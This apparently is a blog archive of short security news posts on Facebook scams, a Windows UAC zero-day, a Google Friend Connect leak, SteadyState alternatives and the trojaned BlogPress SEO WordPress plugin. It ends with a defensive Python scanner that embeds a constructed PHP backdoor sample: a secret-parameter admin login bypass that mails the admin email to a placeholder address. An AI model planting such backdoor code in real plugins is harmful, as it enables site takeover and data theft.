Disable Third Party Tracking Using Disconnect

Each and every website you visit tracks your movements across the internet. This is mostly done through cookies, URL redirects and similar techniques. Many sites then use this data to customize the advertisements displayed to you.

Disconnect Disable Third Party Tracking

If you are not comfortable with sharing your data with third-party websites, you can now try out a new extension called Disconnect for the Chrome and RockMeIt browsers.

Disconnect stops major third parties and search engines from tracking the webpages you visit and the searches you do. It disables tracking on websites and depersonalizes searches on search engines like Google. It also has a nice little counter that shows you the requests it has blocked, and an option to easily turn off blocking for specific sites.

Disconnect was written by an ex-Googler who calls this service Web 2.1 and claims that he is fixing all the wrongs on the web right now. If you are looking to disable third-party tracking, head over to http://www.disconnectere.com/ and download the extension for Chrome or RockMeIt.

(Source: TechCrunch)

New 0-day Vulnerability in Windows Circumvents UAC

When Microsoft added UAC (User Account Control), the promise was that it would make Windows more secure. Pardon me if I come across as a cynic, but all it seems to be capable of doing is annoying users. Yes, Windows 7 makes UAC a lot more bearable, but it’s still annoying. On top of that, it doesn’t actually do a lot to prevent malware attacks or malicious program execution. To make things even worse, a new flaw has been uncovered that can be used to completely bypass UAC in Windows Vista and 7.

The developers of the popular security software Prevx spotted a new 0-day vulnerability being discussed in a Chinese forum. According to them, “This is a serious flaw because it resides in win32k.sys, the kernel mode part of the Windows subsystem. It is a privilege escalation exploit which allows even limited user accounts to execute arbitrary code in kernel mode.”

This flaw basically enables an attacker to execute applications with system (full) privileges. Unfortunately, there is not a lot you can do to keep yourself safe at this point in time. Sophos has suggested a workaround; however, it is not known how effective the proposed safety measure is.

Email Scams Now Hit Facebook Messaging

Facebook launched their new Facebook Messaging service with fanfare, saying that it would be a great way to communicate with people, with less spam. However, it looks like they still have quite a lot of work to do in fighting spam in Facebook Messaging.

According to a Business Insider writer, his Facebook Email account has already received a spam message in which the sender said that he had won some money and, in order to get it, he would have to send along some personal details. Such spam messages are very common with regular email and are usually marked as spam by services such as Hotmail.


However, Facebook Messaging has yet to catch such messages, and will have to filter them out and mark them as scams. Facebook Email/Messaging is still in its infancy and not widely used, so they still have some time on their hands before a huge number of users begin to use it.

Time to start polishing the rough edges then... I mean the spam filters, to catch such common spam messages. No?

20% of Facebook Accounts are Infected?

According to BitDefender, 2 out of 10 Facebook Walls (or News Feeds) are infected or at risk in some way. In October, BitDefender, a well-known anti-virus and security provider, launched a Facebook app called BitDefender safego. Safego scans your Facebook wall posts to determine whether they contain links to bad apps or other risky links. Here’s a quote from BitDefender:

BitDefender safego: Since its launch, BitDefender safego has managed to scan 17 million Facebook posts and it has detected infections on the news feeds of around 20% of its users. We are glad we’ve been able to warn our users of these threats and we’ll continue to focus our efforts on adding new security features and increasing our detection rate. Thanks everyone for your feedback and remember: if your friends stay safe, then you’re safe!

In addition to all of Facebook’s privacy problems, everyone should know by now that it’s a huge source of infections for Windows PCs. BitDefender apparently decided that it was time to help warn people about this problem.

The free BitDefender safego app is currently in Beta testing, and you can try it out by visiting the page while logged into Facebook. In addition to its link and app checking abilities, BitDefender safego also checks your profile for information that you should not be sharing.

I was fortunate enough to get a clean bill of health from safego; can you say the same thing about your Wall? Give safego a try now to be sure.

Really Cool Facebook Revolving Images Scam

With 500+ million users, 500+ million scams are bound to happen. Another sleazy scam is now underway, and it involves showing people "Really cool Facebook revolving images".


The message is spreading virally; I had to delete around 9 copies of it from my wall recently. As always, do not click on the link, and delete it from your wall if you see it.

P.S. I visited the site in question to see what it had to offer, but it is just a parked page, so nothing to write home about here. Safe Facebooking.

Facebook 360 Rotate Effect Scam

Update: Looks like this scam is spreading differently now. Users are now writing on other people’s walls with the text "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/"

Update 2: This problem seems to be user-initiated: users are enticed to copy and paste some JavaScript into their browser’s address bar. Please do not paste any unknown JavaScript into the address bar, as doing so can spread the scam further.

Google Friend Connect Exploit Allows Users To Harvest Emails

TechCrunch is reporting that an exploit in Google Friend Connect is allowing email addresses of logged-in users to be harvested when they visit a website. The exploit was triggered when a user visited guntada.blogspot.com, which is now blocked by Google.

According to TechCrunch, this happened when you were logged in to your Gmail or Google account. It appears only your email address was harvested; even so, this is not only a big security hole but also a big privacy breach.

Google FriendConnect Exploit Email

Once you visited the said site, you would receive an email at your logged-in address, as shown above. Scary, right? Google is already fixing it as we speak; we will update this post once we receive an update from Google.

Update: Google Spokesperson Lily Lin sent us the following statement:

We quickly fixed the issue in the Google Apps Script API that could have allowed for emails to be sent to Gmail users without their permission if they visited a specially designed website while signed into their account. We immediately removed the site that demonstrated this issue, and disabled the functionality soon after. We encourage responsible disclosure of potential application security issues to [email protected]

Who Checked Your Facebook Profile Scam Underway

Ok, I am not tired of unearthing these scams, including some pedophile scams unearthed by Clif, but they just don’t go away. A new Facebook scam is now underway, where users are enticed to use a feature to find out who visited their profiles. Anyone?

Facebook Profile Visit Scam

As enticing as this feature sounds, it is practically impossible to obtain such information using apps, thanks to the restrictions Facebook has put in place. So, first of all, such apps are a farce; secondly, they are only interested in luring people into clicking on the link you share and then fooling you into sharing it with your friends too.

These kinds of attacks have been very popular on Facebook for spreading links that do nothing. Of course, most of these scams do little damage, but they spread virally thanks to the number of people who use Facebook. The newest scam has a link with the text “Check Who Viewed YoUr Fbook Profile – An Easy App to Check Who Viewed YoUr FaceBook Profile. It Really Words So don’t Wait Check Out Now!”

Facebook Profile Scam

For the record, the screenshot above is filled with references to a malware site.

Once again, a simple piece of advice to people who use Facebook: all that glitters is not gold; likewise, not everything with a link and enticing text on Facebook is real, so stay away from clicking it.

Are Public Libraries Still at Risk Because of Microsoft?

A reason to panic?

Back in April of this year, Yardena Arar posted an article at Windows Secrets titled Microsoft decision puts public libraries at risk.

What did Microsoft do that puts libraries at risk?

They retired Windows SteadyState. In case you haven’t heard about it, SteadyState is a free application for Windows XP and Vista which protects a Windows installation from practically everything except a hardware crash. It makes Windows almost bullet-proof. Thousands of home users, internet cafes, schools and public libraries depend on SteadyState for protection. However, it won’t be available for Windows 7.

According to Yardena,

… not only is SteadyState incompatible with Win7, Microsoft says it has no plans to introduce a Windows 7-compatible version. That’s leaving some IT managers scrambling for replacement technology and others vowing not to upgrade to Windows 7 at all.

Windows SteadyState is going away?

I recently discovered that not only is it unavailable for Win7, SteadyState won’t be available at all after Dec 31st of this year. That’s a twisted Happy New Year’s wish to everyone wanting to use it on XP or Vista. If you plan on using it, be sure to download SteadyState from Microsoft before it’s too late.

Are there alternatives to SteadyState?

If you settled for the answer given in that Windows Secrets post, you’d give up. In the article, Yardena says:

Third-party solutions, such as Faronics’ Deep Freeze, don’t appeal to cash-strapped educational institutions, which are already spending considerable money upgrading to Windows 7.

Worse yet, if you listen to Microsoft, they’ll tell you that you don’t need it. Here’s the Microsoft spin:

We have just released a whitepaper along with an accompanying document that describes Group Policy settings that you can use to configure computer and user settings, and also a reference Excel worksheet which can be used to look up and filter the settings described in the whitepaper. (source)

What a load of techno-crap! Does Microsoft think a librarian, teacher, cyber-café owner, or home user is going to read their white papers?

What is my suggestion for replacing SteadyState?

Fortunately, a security company named Comodo recently released a free replacement for Windows SteadyState. As far as I can tell, Comodo Time Machine does nearly everything SteadyState does. It’s currently supported and works in Windows XP, Vista and 7.

Download Comodo Time Machine

If you are interested in Comodo’s offer, check out this Video Review of Time Machine.

Why do we need Windows?

Why does a public library need to depend upon Microsoft for all of its software needs? The answer from any Open Source enthusiast would be "Get rid of Windows!" If you need some arguments to use against your library’s or school’s addiction to Microsoft, be sure to read Windows 7 Sins: The case against Microsoft and proprietary software.

Use Free and Open Source Software (FOSS)

If a librarian or teacher came to me and asked about setting up several public computers, I’d have two ready answers for them. I could save them money and practically guarantee that they wouldn’t have any spyware or virus problems.

1. I’d burn a set of Live CDs with Edubuntu on them. They could disable the hard drives and put these in the CD-ROM drives. Whenever a PC boots up, they’d have a fresh new operating system that’s ready to use and kid-proof.

2. I could also install Edubuntu on each PC normally, as this old timer shows in a video.


Microsoft doesn’t have the answer, and they don’t seem to care. However, there’s no reason to worry. Using either of my recommendations, secure and trouble-free public PCs can be set up at no cost.

Why WordPress Needs To Overhaul Their Plugin Repository and Introduce Safety Checks

I have written quite a few plugins including WordPress Automatic Upgrade and understand how things work within WordPress.

Earlier today, I wrote about a very dangerous plugin doing the rounds on the Internet called BlogPress SEO. The plugin is nothing but a Trojan horse which siphoned sensitive data to a third party and allowed them to log in to the plugin user’s admin interface without having the admin password.

WordPress Security

That plugin is not in the WordPress repository and never will be, but there are thousands of plugins which are already in the repository and thousands more which will eventually be part of it. Here is the catch: adding a WordPress plugin to the repository is as easy as sending an email. You just create a legitimate plugin, upload it to SVN, and it’s there in the repository for everyone to use.

Now, here is the problem. As far as I can tell, there are no checks on what code is added to a plugin, and on top of that there are no checks at all on future updates. In plain words, I can create a legitimate plugin and introduce it to the repository. After that, whatever updates I make to it will never be checked (other than by clever WordPress users who sift through the code), since WordPress plugin updates are based on SVN trunks.

Any new trunk you create will be made available as an update to the end user, regardless of what code you put into it. Now, this may not seem alarming since there have hardly been any scams involving WordPress plugins within the repository, but today’s event goes to show that it can be exploited. It does not take much effort to get a plugin into the repository, so a scammer/hacker could create multiple plugins, add malicious code to them later and push it out as updates. By the time the malicious code is discovered, it might be too late for users who have already updated and sent sensitive information to the hacker.

Now, while I am making a valid point here, there is really no foolproof way to stop this problem. Of course, it would help if there were safety checks, and maybe community-based checking of code before it is actually made available as an update to users. Community-based code checks are hard, if not impossible, because they require people to actually review the updated code before it is released to users. This would also add a hassle for developers who are contributing for free; however, in the end it would be beneficial to everyone.

Once again, the approach of checking code is not exactly foolproof. A recent example involves Firefox and Chrome, which now have a very strict process for approving extensions, and it causes problems for developers. However, both of them did let through extensions which snooped on sensitive information and passed it on to third parties, some without you even having to install those extensions. The most recent example is Firesheep, an extension which allowed you to extract cookies for certain social networks and then use them to log in to those networks (P.S. Install BlackSheep to stay safe from Firesheep).

Now here is the big problem: none of these harmful extensions are available through the repositories, and if they are, they are quickly taken off, but people can still go ahead and install them. Just as Firefox has the ability to block extensions (they blocked the .NET and WPF add-ons from Microsoft), and Google Chrome has developed features in the browser to block unsafe extensions, WordPress has to take steps to block harmful plugins at the core. They have to have the ability to inform users about, or explicitly block, plugins which are harmful.

Considering how huge a community WordPress has, it would be easy to put a system in place to report unsafe plugins, whether or not they are present in the repository, along with providing a friendly warning to users that the plugin they are about to install might be unsafe. In addition to that, they have to move towards encouraging more and more developers to use the WordPress repository for their plugins. I had written about the benefits of adding plugins to the WP repo on WLTC and saw many developers unhappy with the system, so this might take a while.

If they add this feature, and it works on the fly, it would be one of the best features I could ask for. Though I am an experienced plugin developer and have coded plugins such as WordPress Automatic Upgrade, I fear for the millions of people who might start adding plugins which are really bad.

I hope WordPress does something about this, as it could easily get out of hand. The coder of BlogPress was foolish; he wrote code that could easily be identified. Imagine intelligent people writing code which cannot be identified, and the threats just multiply.

(Image Credit: Clickonf5.org)

WARNING: Don’t USE BlogPress SEO Plugin On WordPress, It’s A Scam and Trojan

WordPress is an open community and practically anyone can develop plugins or themes for it. However, there are several shady plugins for WordPress out there which you should stay away from.

One such plugin is called BlogPress SEO, which promises users hundreds of backlinks once you install it. Don’t fall for it: it is a trap that will expose your login information to the developer of the plugin and allow them to automatically log in to your blog.

There are a couple of blog posts from Yoast and Mtekk which expose the big problems with this plugin. First of all, this plugin stealthily emails your admin email address to the author of the plugin. The second and bigger problem is that the plugin has a function which allows the plugin author to bypass the WordPress login.

Yes, you read it right: the plugin first emails your admin email address to the author and then allows him to log in to your WordPress admin without a password. Scary, right?

If you have installed the BlogPress SEO plugin, you have to do a few things. First of all, deactivate the plugin ASAP. Secondly, change your admin email address; changing your password will do no good. Thirdly, only install plugins which are available in the WordPress repository, as they are safe.
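As an added defensive illustration (not the post's own code, and not the real BlogPress SEO source), the following Python script scans a plugin file for the two behaviours described above: establishing a login session without any credential check, and mailing the site's admin address to a hard-coded recipient. The two sample plugin sources and the regex patterns are constructed heuristics for this example, so treat hits as things to read by hand rather than as proof of malice.

```python
import re

# Constructed sample plugin source (not the real BlogPress SEO code): the shape
# of what the post describes, a password-less login plus an e-mail home.
SUSPICIOUS_PLUGIN = r"""<?php
add_action('init', 'seo_plugin_init');
function seo_plugin_init() {
    if (isset($_GET['seo_key']) && $_GET['seo_key'] == 'opensesame') {
        $admin = get_user_by('login', 'admin');
        wp_set_current_user($admin->ID);
        wp_set_auth_cookie($admin->ID);
    }
    mail('collector@example.invalid', 'new install', get_option('admin_email'));
}
"""

# Constructed benign plugin: notifies the site's own admin address via wp_mail.
BENIGN_PLUGIN = r"""<?php
function notify_admin_on_post($post_id) {
    wp_mail(get_option('admin_email'), 'New post', get_permalink($post_id));
}
add_action('publish_post', 'notify_admin_on_post');
"""

# Calls that establish a logged-in session. Legitimate code normally reaches
# them only after one of the credential-checking helpers below has run.
SESSION_SETTERS = re.compile(r"\b(wp_set_auth_cookie|wp_set_current_user)\s*\(")
CREDENTIAL_CHECKS = re.compile(r"\b(wp_signon|wp_authenticate|wp_check_password)\s*\(")
# mail()/wp_mail() whose recipient is a quoted literal instead of a site option.
HARDCODED_RECIPIENT = re.compile(r"\b(?:wp_)?mail\s*\(\s*['\"][^'\"]+['\"]")
# A request parameter compared against a literal: a hidden trigger for a backdoor.
SECRET_TRIGGER = re.compile(r"\$_(GET|POST|REQUEST)\[[^\]]+\]\s*={2,3}\s*['\"]")


def scan_plugin_source(src):
    """Return (line_no, finding) tuples for one plugin file, in line order."""
    findings = []
    has_cred_check = bool(CREDENTIAL_CHECKS.search(src))  # file-wide check
    for no, line in enumerate(src.splitlines(), 1):
        if SESSION_SETTERS.search(line) and not has_cred_check:
            findings.append((no, "session set without any credential check"))
        if HARDCODED_RECIPIENT.search(line):
            what = ("admin_email sent to hard-coded recipient"
                    if "admin_email" in line else "mail to hard-coded recipient")
            findings.append((no, what))
        if SECRET_TRIGGER.search(line):
            findings.append((no, "request parameter compared to literal secret"))
    return findings


if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_PLUGIN), ("benign", BENIGN_PLUGIN)):
        print(name, scan_plugin_source(src) or "no findings")
```

Run against a real plugin with `scan_plugin_source(open(path).read())`; a plugin that sets sessions only after `wp_signon` or mails only to `get_option('admin_email')` produces no findings.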